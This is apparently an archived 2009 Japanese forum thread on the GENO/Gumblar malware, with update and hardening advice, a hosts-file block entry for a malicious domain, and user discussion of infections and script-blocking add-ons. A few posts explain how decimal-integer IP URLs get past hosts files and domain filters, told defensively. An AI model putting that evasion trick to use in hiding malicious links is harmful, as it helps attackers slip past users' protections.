[表示 : 全て 最新50 1-99 101- 201- 301- 401- 501- 601- 2chのread.cgiへ]
Update time : 05/09 15:33 / Filesize : 157 KB / Number-of Response : 689
[このスレッドの書き込みを削除する]
[+板 最近立ったスレ&熱いスレ一覧 : +板 最近立ったスレ/記者別一覧] [類似スレッド一覧]


↑キャッシュ検索、類似スレ動作を修正しました、ご迷惑をお掛けしました

GENOウイルススレ ★22



1 名前:名無しさん@お腹いっぱい。 [2009/06/22(月) 12:15:57 ]
■ adobe readerを最新版にアップデートする
ttp://get.adobe.com/jp/reader/
 とりあえず最新版にしましょう。
 インストール後本体をアップデートしておく事
 adobe readerを開いて ヘルプ→アップデートの有無をチェック
■ adobe flashplayerを最新版に更新
ttp://www.adobe.com/go/getflashplayer_jp

以上でGENOは防げるが亜種等のため以下推奨
■ acrobat javascriptをオフに
  adobe readerを開いて メニュー→編集→環境設定→javascript→acrobat javascriptを使用のチェックを外す
■ブラウザでスクリプト使用を基本無効に設定
  FirefoxにてNoscriptを利用
  (Operaでflashオフでもおk([F12]を押す→[プラグインを有効にする]のチェックを外す)
  (sleipnir、IEでも上手に設定するとなんとかなります)

優先度低
■ Vistaの人ははUACをONにする
■ hostsファイル書き換え
  hostsファイルに以下の行を追加
  127.0.0.1 martuz.cn
  hostsファイルの在処
  Windows XPの場合→「C:\WINDOWS\system32\drivers\etc」
  Windows 2000の場合→「C:\WINNT\system32\drivers\etc」
  Windows 95/98/MEの場合→「C:\Windows」

感染が疑わしい人は迷わずクリーンインストール推奨です。
★Anubisレポート
ttp://anubis.iseclab.org/?action=result&task_id=1890669b0bd937574e5be45e24c63ea80&format=html
★GENOウイルスまとめ
ttp://www29.atwiki.jp/geno/

139 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/06(月) 09:52:48 ]
>>138
改竄サイトに置かれたjavascriptで攻撃サーバーに誘導しAdobe製品の脆弱性を突いて
ウィルスをダウンロードし感染させる攻撃のプロセスを持った一連のウイルス

通称 Gumblar/GENO

140 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/06(月) 12:25:45 ]
Adobeしねよ
糞製品ばっか作りやがって

141 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/06(月) 14:51:53 ]
Reader削除しちゃえばいい

142 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/06(月) 16:29:15 ]
ここでの質問はスレチかな

Reader以外のpdf閲覧ツールなら大丈夫な理由は、Readerの脆弱性を突いてるからで
他の閲覧ツールなら問題のpdf開いても大丈夫ってことなんだよね。

もしAっていう閲覧ツールが、Readerの脆弱性のある機能?と同じ機能を持ってたら
当然Aで閲覧するのも危険なんだよね

143 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/06(月) 16:52:41 ]
同じ機能にAdobeと同じ脆弱性があるかは分からない
実装が違えばない

144 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/06(月) 17:36:44 ]
>>143
ありがとう。納得した。

145 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/06(月) 17:37:00 ]
iframeも切っとけ

146 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/06(月) 22:54:28 ]
reader削除(flashは有)してOSはVISAでUAC有効、ブラウザはopera(要設定)かfirefox(アドオン、設定必須)で比較的安全か
IEは8入れたらえらい事になったから通常用途では二度と使わない
2chブラウザのためにIE7は残しておく

147 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/06(月) 23:44:50 ]
>>139
ご丁寧な解説ありがとうございます
検出名より感染プロセスで一括りに
されるということでしょうか
いずれにしろ大変 勉強になりました






148 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/07(火) 00:39:24 ]
>>147
検出名は内部組成や亜種の生成ルートの推定から行われるもので、検出名はワクチンベンダの一存、系譜の根拠にするものではない
推定される亜種・模倣の系譜でGENOって呼んでるから、感染プロセスで適当に一括りしてるわけではない・・・はず

それに、132のレスのID:VmXw78Zk0の言い分を見るに、今までのGENOをカスタムして作られてるからこれも亜種
つっても、感染経路を拡張し、偽装方法を変更し、発症症状を変更し、踏み台を入れ替え、感染経路を新造して、亜種の亜種の亜種って続いてきただろうから、オリジナルの痕跡は残っていない可能性も有るけどな

しかし9.1.2+adobe script offでもやっぱり穴があったのか
案の定の結果だが渦中の本家に亜種としてゼロデイやられるとか、Adobe舐められ過ぎワロス
俺はOpera使いだからこそ気楽にプラグイン切り替えられるが、こんな変態ブラウザは一握りだし・・・
もうどうしようもない所まで来てるなぁ・・・

149 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/07(火) 02:22:17 ]
>>148
Adobe以外の脆弱性もついてたみたいだからそっちかもしれないよ

150 名前:名無しさん@お腹いっぱい。 [2009/07/07(火) 02:33:53 ]
ウイルスに詳しい方が多いと思うので、教えてください

サイトが感染というよりも…
レンタルサーバー屋自体が、ウイルス感染したみたいなんです
(かなり有名なとこです)

これはGENOウイルスなのでしょうか?

上手く説明できないので…
詳しいことは、そのレンタルサーバーのスレッドを見て頂けたらと思います

正直、とても不安です

VALUE DOMAINってどうよ? part33
pc11.2ch.net/test/read.cgi/hosting/1246828727/

151 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/07(火) 03:29:18 ]
>>150
はい同類です
wikiwikiはこれが原因だったようです

アンチウイルスが反応なしでもPCが不安定になったなど
心当たりがある場合はOSの入れなおし推奨
心配な場合も入れなおしどうぞ

152 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/07(火) 10:27:36 ]
>>148
やり口は似ていても、その中で GENOの系譜を継ぐものと継がざるもの
ルーツなり経緯なりで明確ではないにしろ一線を画すということでしょうか
大元をたどれば、どこに行き着くかということかもしれませんが…。
自分のような一般の人にとっては危険なことには変わりありませんので
>>134の言うとおり >わかるやつにはわかる でいいのかもしれませんね
可否スレの方たちが新種・亜種・別物と分析なさってくれてますし

>>130
今そのレス見ると、カスペがユーザー使用環境で対応してるか
確認の依頼だったかもしれないですね。重ね重ね失礼しました

>>149
>Adobe以外の脆弱性
さっき、そのスレ見たら
>既知の(パッチ済みの)脆弱性
と誰かが書き込んでました
参照URlは「Microsoft Video ActiveX コントロールの脆弱性」のページでした

153 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/07(火) 10:39:37 ]
1つはPDF等の脆弱性を突いたもの GENO亜種
1つはActiveXの脆弱性を突いたもの ゼロデイアタック
共通点はいずれも配布元が香港

154 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/07(火) 10:54:32 ]
前に狩りがどうの正義がどうののスレ
見たことあるけど、それもつながってるの?

155 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/07(火) 11:13:24 ]
IE×Firefox×Opera×Safari×Chrome 最終戦争7回戦
pc12.2ch.net/test/read.cgi/software/1246005705/119


156 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/07(火) 12:05:12 ]
>>151
ありがとうございます

自分のパソコンに関しては、とりあえずクリーンインストールをしようと思います

ただ今回、ログインページに仕掛けられてたみたいなので…

サイトのファイルを他へ移転できたとしても…
サーバーに預けてるドメインを、ログインしないと移管出来ないのがきついですね

157 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/07(火) 13:22:46 ]
おたくのスレにあったレスを頼りに情報たどっていくと
このページに行き着くけど、恐いから直リンや止めとくわ
ttps://www●value-domain.com/howto/?action=transfer(●は.)
一応view-source:で、おたくのスレの85-86が入ってないのは見た
ソース見れるなら自分で確認してほしい。自己責任で



158 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/07(火) 13:43:10 ]
>>152
パッチ済みじゃないよ
Microsoft ビデオの ActiveX コントロール脆弱性により、リモートでコードが実行される.
www.microsoft.com/japan/technet/security/advisory/972890.mspx

対策方法はこちら
support.microsoft.com/kb/972890/

なるべくならIEを使わないほうが良いらしい

159 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/07(火) 14:08:32 ]
>>158
またVISTAは相手にされなかったのか・・・

160 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/07(火) 14:12:56 ]
>>158
誤読してました。ちゃんと未パッチの脆弱性
ってありましたね。お手数をおかけしました

161 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/07(火) 21:50:39 ]
>>159
ユーザ少ないし、セキュリティ強めだから手間掛けるまでも無いってか。
それにWindowsUpdateでパッチしにくい脆弱性が発見されていると仮定して、今その穴を使ったら出荷前の普及するだろう7で対策される公算が高いわけで。

162 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/08(水) 05:41:51 ]
今更だがfirefoxのnoscriptは信頼できないサイトと信頼できるサイトの制限設定が排他処理じゃないなのが問題だな
これだと、許可サイトは強制的に全てを許可されるからOSがXPだと少々怖い
operaの方が妥当かもしれない
信頼サイトにも個別に制限出来るようにすべき

163 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/08(水) 11:07:30 ]
本末転倒かも知れんが、NoScriptとAdblockの併用いいよ

164 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/08(水) 13:55:25 ]
NoScript と YesScript を併用すりゃいいんじゃね?

165 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/08(水) 14:31:17 ]
YesScriptは、URLをブラックリスト登録して初めてJavaスクリプトが無効にできる
サイトがころころ変ってしまうような場合は無力だよね

166 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/08(水) 14:37:59 ]
Adblockは、直接埋め込まれたjavascriptは無効にできないよね
ブロックするのが外部のjsだけなら簡単なんだけどね

167 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/08(水) 14:48:05 ]
>直接埋め込まれたjavascriptは無効にできない
あああああああああああああああああああああああああああああああああ



168 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/08(水) 16:35:37 ]
じゃあどうすりゃいいのよ

誰か対策まとめてくれ

169 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/08(水) 17:05:33 ]
【韓国】青瓦台、国会、国防部、ネイバーなど25サイトにDDoS攻撃[07/08]
takeshima.2ch.net/test/read.cgi/news4plus/1247014272/

170 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/08(水) 17:27:59 ]
ax.xrea.comが感染か
>>168
OSをvistaに変更

171 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/08(水) 17:33:21 ]
>>168
LANケーブル引っこ抜く

172 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/08(水) 17:45:59 ]
RequestPolicyは?

173 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/08(水) 17:46:58 ]
あれ、凄い使い難い

174 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/08(水) 17:55:07 ]
>>170
XPのパソコンをVistaにアップグレードするのも意外と危険なんだよね
うまくインストできてもXPで当たり前のようにできていたことができなくなるし


175 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/08(水) 17:56:55 ]
ha?

176 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/08(水) 18:04:19 ]
>>172
Operaに似たような機能が標準で付いているけれど
動画サイトで使うの大変だよ

177 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/08(水) 18:12:30 ]
xreaは今朝アクセスしたら確かにノートン先生が大怒りだったな 
activeX系だからvistaは対象外だが



178 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/09(木) 00:22:29 ]
おいおい、Adobe関連は全て最新にしてたのに感染したっぽい
しかもブラウザどころか最早タスクマネージャすら起動しない始末
どうしろと

179 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/09(木) 00:56:45 ]
使用OS、ブラウザ、javascriptの有無を
まぁ、別件でxreaのようなタイプ(activex経由)なら感染は有り得る

180 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/09(木) 01:35:54 ]

>>178
ActiveXからやられたんだろ

181 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/09(木) 02:14:46 ]
Adobeだけ最新なら別のものじゃないの

182 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/09(木) 09:08:26 ]
>>153

183 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/09(木) 14:31:38 ]
そもそも何に感染したかわかってないようだし
症状的にも今回のもの(新種ではなく旧来のキーロガー)と違う感じなので
別の何かではないかと

184 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/09(木) 19:48:28 ]
タスク自体重いのならマザーボードがお逝きになる寸前かもね

185 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/10(金) 01:12:49 ]
ディスプレイで虫みたいなのがグルグル動きまくってて何か感染したのかとおもったら
本物の虫だった

186 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/10(金) 02:28:33 ]
これが北朝鮮の選択か…米韓への田代砲攻撃、止まる気配なし
tsushima.2ch.net/test/read.cgi/news/1247153428/

187 名前:名無しさん@お腹いっぱい。 [2009/07/10(金) 13:58:37 ]
xreaのアクセス解析にアクセスしましたが、私のパソコンに感染はしていないみたいです
アクセス解析は大丈夫なんでしょうか…。



188 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/10(金) 14:22:12 ]
【アクセス解析】AccessAnalyzer.com Part5【XREA】
pc11.2ch.net/test/read.cgi/hp/1234096306/

189 名前:名無しさん@お腹いっぱい。 [2009/07/11(土) 06:02:29 ]
>>188
ここ開いただけでavast!が反応する..ガクガクグルグル

190 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/11(土) 19:28:05 ]
もう怖いから夜のエロサイト以外見ないようにする

191 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/11(土) 21:45:15 ]
いや、そのエロサイトが危ないんだがwww

192 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/12(日) 00:44:36 ]
ファイル共有ソフト「Share」が何者かに攻撃を受けフリーズしまくる 2PB
tsushima.2ch.net/test/read.cgi/news/1247162852/

193 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/12(日) 01:46:37 ]
情報もれてもいいシュミ用のパソコン用意すればいいんだよ

194 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/13(月) 11:25:14 ]
廃れた

195 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/13(月) 16:28:31 ]
【share】 sharebot丸の内OCN監視スレ 【洒落】
hideyoshi.2ch.net/test/read.cgi/download/1247399721/

196 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/15(水) 22:33:32 ]
決闘勝利おめwww

197 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/15(水) 22:34:51 ]
誤爆。。



198 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/16(木) 02:42:31 ]
pc11.2ch.net/test/read.cgi/sec/1243346768/686
>javascript単体でどうこうするウィルスは確かにほとんど居ないが、脆弱性自体はあるし、あった。
>ウィルスではないが、XSSなどはjavascript経由で発症する物がほとんどであるし、切る事で安全性は確実に高まります。

実例

slashdot.jp/security/09/07/15/0449234.shtml
Firefox 3.5のJavaScriptエンジンに未対策の脆弱性が発見される。

最近のJavaScript高速化戦争の弊害だな、こりゃ。
素直に実装するだけならそれなりに枯れて安全になってきていた筈だからな。

199 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/16(木) 12:00:17 ]
TraceMonkeyによるJSの高速化も3.5の売りだから
枯れてないのは仕方がない。
3.0(笑)ではChromeのV8に相手すらしてもらえない。

200 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/16(木) 13:55:16 ]
結局インフルエンザと同じぐらいに収まったな
作ったヤシの全面負けでFA?

201 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/16(木) 19:24:00 ]
genoウイルススレがいくつも立ったのだから作ったやつの勝ちだろ

202 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/16(木) 19:35:57 ]
アフィは儲かったんだろうか

・・・・・あれ?

203 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/16(木) 19:49:49 ]
買わなきゃ入らないamazonでは厳しい
情弱が来るジャンルでもあんまないし
やはりゲームアニメのがいいわ

204 名前:名無しさん@お腹いっぱい。 [2009/07/16(木) 19:50:26 ]
収まっていないようでして・・

パソコンは問題ないようですが
HPが何度も改竄されます。
パスワードを変えても、すぐ見破られてしまいます。

どしたらいいんでしょう





205 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/16(木) 19:51:48 ]
そんなやばすぎるHPは一旦閉鎖しろ

206 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/16(木) 19:57:38 ]
まだあんのか、このすれw

207 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/16(木) 19:57:45 ]
>>204
VALUE DOMAINってどうよ? part35
ttp://pc11.2ch.net/test/read.cgi/hosting/1247663722/

【アクセス解析】AccessAnalyzer.com Part6【XREA】
ttp://pc11.2ch.net/test/read.cgi/hp/1247279199/



208 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/16(木) 20:16:42 ]
何で今になって

209 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/16(木) 22:17:37 ]
>>204
問題ないかどうかは本当に確認した?OS入れなおした?
それ以外なら>>207関連かな

210 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/17(金) 01:38:29 ]
>>203
アニオタゲーオタって無知な奴多いのか

211 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/17(金) 02:03:33 ]
>>204
感染したままでパス変更してるか、感染したPCで更新作業してるかだろ。
HPは全ファイル削除→PCリカバリ→ftpパス変更→HPにファイル戻し

212 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/17(金) 02:05:32 ]
>>210
ガキがくるからな

213 名前:名無しさん@お腹いっぱい。 [2009/07/17(金) 14:26:59 ]
アバストが反応してJS:Redirector-H4 [Trj]を検出しましたと出た。
ブロックしてくれたから良かったけど。

214 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/17(金) 14:35:08 ]
それは報告しなくていいです

215 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/17(金) 14:49:46 ]
私の戦闘力は530000です

216 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/17(金) 17:39:31 ]
私の愛馬は凶暴です

217 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/18(土) 22:34:41 ]
>>215
とっとと本気出せよオカマ野郎



218 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/19(日) 08:56:28 ]
アンラボ■■■【アンラボ】V3ウイルスブロック Part6■■■
pc11.2ch.net/test/read.cgi/sec/1207926691/

これきくんだろうか

219 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/19(日) 09:03:51 ]
さぁ

220 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/19(日) 18:34:03 ]
ウィルスブロック2005を更新するのわすれてて2005のままの私が通ります。


221 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/24(金) 00:03:17 ]
【GENO】 またFlash Playerの脆弱性を突いたウイルス出現
tsushima.2ch.net/test/read.cgi/news/1248360445/

222 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/24(金) 02:00:02 ]
vistaの一人勝ち
まぁ、それくらいのメリットがないと救いようのない地雷OSだからね

223 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/24(金) 02:07:11 ]
マジ糞すぎる
Adobe潰せ

224 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/24(金) 02:10:24 ]
Silverlight, XPS の MS の時代を望んでいるんですか?

225 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/24(金) 02:40:21 ]
djvuもたまには思い出してあげてくださいね

226 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/24(金) 03:42:14 ]
silverlightは某動画サイト(現在、閉鎖)にも採用されていたから意外と面白いかもしれんが
開発環境が厳しいらしいな

227 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/24(金) 18:06:20 ]
GenoウイルスNineballとは関係ないんで、スレ違いなんだが、
最近、Firefoxが謎のIPと 暗号化通信 している。

209.134.161.75
なんだが、Whoisにかけると Internet Security Systems とかいう知らないドメインらしい。
気持ち悪すぎるんだが、だれか分かる人いない?
ググルと、同名のIBMが買収した組織が存在するようだが、同名ってだけで同じとは考えにくい。

こういうことが質問できるスレでも構わないからアドバイスが欲しいっす。



228 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/24(金) 18:54:47 ]
firefoxじゃなくセキュリティソフトの鯖の可能性があるね

229 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/24(金) 19:08:52 ]
>>228
レスありがとう。
でも、そのセキュリティーソフト(Kaspersky)で>>227をモニターしているんだ。
それで通信しているアプリがFirefoxだと表示されちゃう。

通信先のサーバーもKasperskyのものではないみたいだし、
googleのセーフブラウジングでも、Firefoxの更新を確認するためにモジラのサイトと通信しているのでもない
みたいで気持ちわるいっす。


230 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/24(金) 19:37:20 ]
じゃあ、アドオン、2chブラウザ、無線LAN、メーカー製PCなら常駐アプリがバックグラウンドでアドウェアのような事をやってるとか
うちもfirefox3.0.12(OSはvista)だがそういう挙動は一切ないな

231 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/24(金) 19:50:04 ]
>>230
レスありがとう。
Firefox3.0.12で問題ないって情報だけでも助かる。
今は3.51を使っているけど、そっちの環境も残してあるので確認してみる。

一番ヤバイのはFirefoxの通信と偽ってアドウェアが通信していることだよね。

ところで、
>そういう挙動は一切ないな
はどうすれば確認できる?

232 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/24(金) 20:12:15 ]
firefoxスレで訊いたら?

233 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/24(金) 22:24:32 ]
>>227
>同名のIBMが買収した組織が存在するようだが、同名ってだけで同じとは考えにくい。
考えにくいというのは何で?
正引き逆引き一致でwebapp.iss.netなんだけどあやしいの?

アドオン何いれてるの?
アドオンなしでもその通信発生するの?

P2Pやエロサイト巡回で不審な動作をしたなど心当たりがあるなら
素直にOS入れなおしたほうが安心だと思うよ

234 名前:231 mailto:sage [2009/07/24(金) 23:55:20 ]
>>233
わざわざ試してくれてありがとう。

自分でやったら一致しなかったんだ。 おかしいよね。
どこのwhois使っても同じ結果になるはずだけど、 良かったら どこで検索したか教えてくれない?

>素直にOS入れなおしたほうが安心だと思うよ
自分もまったくその通りだと思う。
ただ、面倒だから自分の勘違いだったり、まっとうな理由が見つかればいいなぁと思っている。

>P2Pやエロサイト巡回で不審な動作をしたなど心当たりがあるなら
一般的にヤバイとされるサイトには行っていないし、プラグインも全オフ状態。
FirefoxアドオンのNoScriptが"ざる状態"らしいと知った昨日からはJavaScriptも切っている。

ただ、>>230さんの言うように、3.0.12の時にはこんな通信していなかったはずだと自分も思っていた。
思い当たるきっかけといえば 3.50以降にアップしてから ってことになっちゃう。
もちろん、そのタイミングで何かに感染したのかもしれないけど・・・。

アドオン関連は3.0.12と3.51で同じのしか入れてないから、
3.0.12で試して その後、アドオン全オフの3.51環境を試してみます。

気まぐれに通信開始を試みている感じなので、検証には時間かかると思います。

一番良い結果は、これまでに書いたことが勘違いで、
通信先のInternet Security Systems が安全なサイト プラス 何かのアドオンがそこのデータを利用していることですね。

>>233 さんの書き込みで希望が見えてきました!

235 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/25(土) 00:06:17 ]
>>234
www.cman.jp/network/support/ip.html

いい加減スレチだしFirefox関連スレでアドオンさらしたほうが早いと思うけどね

236 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/25(土) 00:11:29 ]
>>235
thankyou!

237 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/25(土) 04:01:32 ]
Noscriptがざるだって初めて聞いたけどFirefox関連でボロクソいわれてるなあ
別のアドオン探すか




238 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/25(土) 06:31:43 ]
Noscriptってザルなの?

239 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/25(土) 10:29:28 ]
おれfirefox関連スレのROM専だけど、向こうでNoScriptをなんやかんや言ってるやつはPC初心者板並のスキルだと思うよ


240 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/25(土) 12:00:45 ]
opera使えよ

コピペ禁止スクリプトなんて余裕で貫通する最強ブラウザだ

241 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/25(土) 15:28:00 ]
opensauceなんだからdiffしてくださいな

242 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/25(土) 20:07:26 ]
>>239
スレはみてないけどほかで検証されてるから初心者云々関係ないよ
NoScript すり抜けでぐぐればすぐ出てくる

243 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/25(土) 20:17:17 ]
noscriptは許可サイトは丸裸
非許可サイトもIFRAMEをスルーしてしまう問題がある(最新verでも同様)
完全に気休めアドオンだね
本当に信用出来るのはブラウザでもアドオンでもセキュリティソフトでもなくvistaのUAC先生だけ
firefoxが駄目ならoperaに移るか!という浅はかな考えを抱いているとXPユーザーは痛い目に合う可能性がある

244 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/25(土) 22:08:40 ]
安全性だけなら2000でもXPでも制限ユーザーで動かせば同じじゃないか?

245 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/25(土) 22:23:32 ]
管理者権限をのっとってry

246 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/25(土) 22:26:57 ]
2749172507/
↑IEかchromeでアクセスすると変換してsupport.mozilla.com/ja/kb/Live+Bookmarksにつながる

HostsやURLドメインフィルタでブロックし難いようにしている、敵ながらあっぱれだよな
例えばttp://2749172507/jp.jsのように jp.js などが付いているとうっかり信用して許可サイトに登録してしまう

247 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/25(土) 23:02:29 ]
>>242
NoScriptも万能じゃないし、一つに頼り切るのも危険じゃん

「NoScript すり抜け」検索のブログで検証
一応そのブログのIFRAMEは完全にブロックできてた(下記画像Firefox3.5.1)
up2.viploader.net/pic/src/viploader1100692.jpg



248 名前:名無しさん@お腹いっぱい。 [2009/07/25(土) 23:46:56 ]
>NoScriptも万能じゃない

確かに。

249 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/26(日) 11:30:16 ]
あくまでも補助機能としてnoscript入れてるんだろ
誰もこれさえ入れていれば大丈夫と思ってるやつはいないだろ

250 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/26(日) 11:34:58 ]
>>247
うちもブロック出来てた。
すり抜け現象はそのブログの中の人の設定ミスかなんかじゃないのか。

251 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/26(日) 11:45:26 ]
なんかわからんがよs

252 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/26(日) 12:21:21 ]
>>246
よく分からんが、やばそうなので、
どういうことか詳しくおしえてくれ。

253 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/26(日) 13:10:39 ]
これだとマイクロソフトだと一目でわかる↓
www.microsoft.com/ja/jp/default.aspx
これだと解りにくい↓
3475948030:80/ja/jp/
上記の両方とも同じサーバーの同ページにつながる

ここで、www.microsoft.comが悪意のあるサイトと仮定する。
信頼している、ゲーム・動画サイトでFxのNoscriptが3475948030:80/ja/jp/をブロックしたとする
一般的にゲームや動画ができるまでセキュリティを弱め許可していくだろう
.cn/などのトップレベルドメインなら警戒するが、URL内にjpが入っていると比較的安心な国内鯖などと勘違いして許可してしまう恐れがある。
他には、フィルタリングソフトなどで.com/の全てをブロックしても3475948030:80/ja/jp/はすり抜けてしまう。

※上記リンクは全て信頼のマイクロソフトのサイトです。

254 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/26(日) 13:27:09 ]
hosts
127.0.0.1  www.microsoft.com
フィルタリングソフト
禁止 www.microsoft.com 及び .com

上記のブロックをしても埋め込まれた3475948030:80/ja/jp/はすり抜ける
まぁ具体的なサンプルでないので解りにくかったかも知れない

255 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/26(日) 13:36:24 ]
ネットもリアルと同じように詐欺が存在する。
VistaUAC、FirefoxNoscriptなどで武装しても罠にかかる人はかかる。
それぞれの特性を理解して使わなくてはいけないということでしょう。

256 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/26(日) 15:28:48 ]
>>250
キャッシュファイルは完全に消してからやった?

257 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/26(日) 17:16:07 ]
だいたいURLが数字ばっかのところに行くか普通



258 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/26(日) 21:10:41 ]
>>257
数字でも英数字でもひらがなでも
普通は行くよ

ttp://さだまさし.jp/

259 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/26(日) 21:13:22 ]
マイクロソフト・ホーム
tinyurl.com/microsoft-japan

260 名前:名無しさん@お腹いっぱい。 [2009/07/26(日) 21:24:02 ]
>>259
GoogleChromeは可、その他不可

261 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/26(日) 21:25:03 ]
>>257-258
……(^ω^; )

262 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/26(日) 23:18:25 ]
Adobe糞が7月中に対策してもまたすぐボロがでると予想

263 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/27(月) 06:07:39 ]
>>258
J-Wordに犯されてるか、
アドレスバーから検索できる設定になってるIEと見た
多分後者だなw

264 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/27(月) 07:59:30 ]
>>263
258は普通に日本語ドメインのことじゃないの?

265 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/27(月) 08:20:29 ]
日本語ドメインだな

266 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/27(月) 08:33:02 ]
どっちにしろ>>258>>257の言いたかったことがわかってないような

267 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/27(月) 08:49:40 ]
